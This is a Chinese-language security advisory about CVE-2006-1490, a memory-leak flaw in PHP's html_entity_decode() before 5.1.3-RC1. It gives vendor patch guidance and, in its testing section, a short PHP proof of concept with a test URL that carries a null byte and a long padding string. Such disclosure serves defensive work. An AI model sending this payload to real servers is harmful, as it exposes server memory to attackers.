首页 -> 安全研究
安全研究
安全漏洞
PHP html_entity_decode()函数信息泄露漏洞
发布日期:2006-03-29
更新日期:2006-11-29
受影响系统:
PHP PHP < 5.1.3-RC1不受影响系统:
PHP PHP 5.1.3-RC1描述:
BUGTRAQ ID: 17296
CVE(CAN) ID: CVE-2006-1490
PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。
PHP的html_entity_decode函数中存在输入验证错误。如果使用该函数的脚本接收了远程不可信任来源的输入的话,就会返回函数的结果,导致内存泄露。
<*来源:Stefan Esser (s.esser@ematters.de)
Tõnu_Samuel (tonu@jes.ee)
链接:http://marc.theaimsgroup.com/?l=full-disclosure&m=114357738604334&w=2
http://docs.info.apple.com/article.html?artnum=304829
http://secunia.com/advisories/23155/
http://security.gentoo.org/glsa/glsa-200605-08.xml
http://lwn.net/Alerts/181294/?format=printable
http://www.us-cert.gov/cas/techalerts/TA06-333A.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
$foobar=html_entity_decode($_GET['foo']);
echo $foobar;
?>
Running it with url:
http://hostname/index.php?foo=%00sssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss \
sssssssss
建议:
厂商补丁:
PHP
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载5.1.3-RC1:
http://www.php.net
RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2006:0276-01)以及相应补丁:
RHSA-2006:0276-01:Moderate: php security update
链接:http://lwn.net/Alerts/181294/?format=printable
Gentoo
------
Gentoo已经为此发布了一个安全公告(GLSA-200605-08)以及相应补丁:
GLSA-200605-08:PHP: Multiple vulnerabilities
链接:http://security.gentoo.org/glsa/glsa-200605-08.xml
所有PHP用户都应升级到最新版本:
# emerge --sync
# emerge --ask --oneshot --verbose dev-lang/php
浏览次数:4522
严重程度:0(网友投票)
绿盟科技给您安全的保障